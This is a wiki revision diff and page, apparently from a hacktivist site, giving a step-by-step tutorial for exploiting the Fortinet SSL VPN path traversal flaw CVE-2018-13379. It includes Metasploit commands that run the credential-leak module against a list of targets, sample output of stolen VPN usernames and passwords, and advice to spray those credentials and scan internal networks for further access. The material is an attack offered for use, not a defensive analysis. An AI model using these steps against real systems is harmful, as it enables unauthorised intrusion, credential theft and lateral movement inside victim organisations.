Fortinet SSL VPN Path Traversal: Difference between revisions
Jump to navigation
Jump to search
Explanation on how to exploit CVE-2018-13379 [Basic] |
mNo edit summary |
||
| (4 intermediate revisions by the same user not shown) | |||
| Line 2: | Line 2: | ||
Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console: | Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console: | ||
* Look for Bookmarks in the VPN console which have internal address and credentials already saved | * Look for Bookmarks in the VPN console which have internal address and credentials already saved | ||
* Connect to the Forti VPN client locally ([https://enlacehacktivista.org/index.php?title= | * Connect to the Forti VPN client locally ([https://enlacehacktivista.org/index.php?title=Opsec_Measures Windows server via RDP]) and scan the LAN for systems and then spray the VPN credentials as explained [https://web.archive.org/web/20230531145531/https://papers.vx-underground.org/papers/Malware%20Defense/Malware%20Analysis%202021/2021-08-31%20-%20Bassterlord%20%28FishEye%29%20Networking%20Manual%20%28X%29.pdf here] | ||
* Scan the LAN for vulnerabilities which we can exploit to gain further access into the network | * Scan the LAN for vulnerabilities which we can exploit to gain further access into the network | ||
To exploit CVE-2018-13379 we'll use metasploit | To exploit CVE-2018-13379 we'll use metasploit as it formats the credentials nicely for us. | ||
Start the database and run it: | Start the database and run it: | ||
* sudo systemctl start postgresql | * sudo systemctl start postgresql | ||
| Line 15: | Line 16: | ||
StArting the Metasploit Framework console... | StArting the Metasploit Framework console... | ||
</pre> | </pre> | ||
Use module: | |||
<pre> | <pre> | ||
msf6 > use | msf6 > use auxiliary/gather/fortios_vpnssl_traversal_creds_leak | ||
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > | msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > | ||
</pre> | </pre> | ||
| Line 55: | Line 43: | ||
host origin service public private realm private_type JtR Format | host origin service public private realm private_type JtR Format | ||
---- ------ ------- ------ ------- ----- ------------ ---------- | ---- ------ ------- ------ ------- ----- ------------ ---------- | ||
10.10.10.11 10.10.10.11 10443/tcp (https) | 10.10.10.11 10.10.10.11 10443/tcp (https) admin 8401327 Password | ||
10.10.10.12 10.10.10.12 10443/tcp (https) cvilleneuve 3264012 Password | 10.10.10.12 10.10.10.12 10443/tcp (https) cvilleneuve 3264012 Password | ||
10.10.10.13 10.10.10.13 10443/tcp (https) vdujardin Jouv2018$ Password | 10.10.10.13 10.10.10.13 10443/tcp (https) vdujardin Jouv2018$ Password | ||
10.10.10.14 10.10.10.14 10443/tcp (https) montechti Thomas2005 Password | 10.10.10.14 10.10.10.14 10443/tcp (https) montechti Thomas2005 Password | ||
10.10.10.15 10.10.10.15 10443/tcp (https) hvac | 10.10.10.15 10.10.10.15 10443/tcp (https) hvac Winter2022 Password | ||
</pre> | </pre> | ||
Latest revision as of 10:23, 5 July 2023
Exploiting CVE-2018-13379 Forti SSL VPN
Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console:
- Look for Bookmarks in the VPN console which have internal address and credentials already saved
- Connect to the Forti VPN client locally (Windows server via RDP) and scan the LAN for systems and then spray the VPN credentials as explained here
- Scan the LAN for vulnerabilities which we can exploit to gain further access into the network
To exploit CVE-2018-13379 we'll use metasploit as it formats the credentials nicely for us.
Start the database and run it:
- sudo systemctl start postgresql
- msfdb init
Start msfconsole:
user@host:~$ msfconsole StArting the Metasploit Framework console...
Use module:
msf6 > use auxiliary/gather/fortios_vpnssl_traversal_creds_leak msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >
Set your targets:
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > set RHOSTS file:targets.txt RHOSTS => file:targets.txt
Run the exploit module!
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > run [*] https://10.10.10.11:10443 - Trying to connect. [+] https://10.10.10.11:10443 - Vulnerable!
View the credentials:
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > creds Credentials =========== host origin service public private realm private_type JtR Format ---- ------ ------- ------ ------- ----- ------------ ---------- 10.10.10.11 10.10.10.11 10443/tcp (https) admin 8401327 Password 10.10.10.12 10.10.10.12 10443/tcp (https) cvilleneuve 3264012 Password 10.10.10.13 10.10.10.13 10443/tcp (https) vdujardin Jouv2018$ Password 10.10.10.14 10.10.10.14 10443/tcp (https) montechti Thomas2005 Password 10.10.10.15 10.10.10.15 10443/tcp (https) hvac Winter2022 Password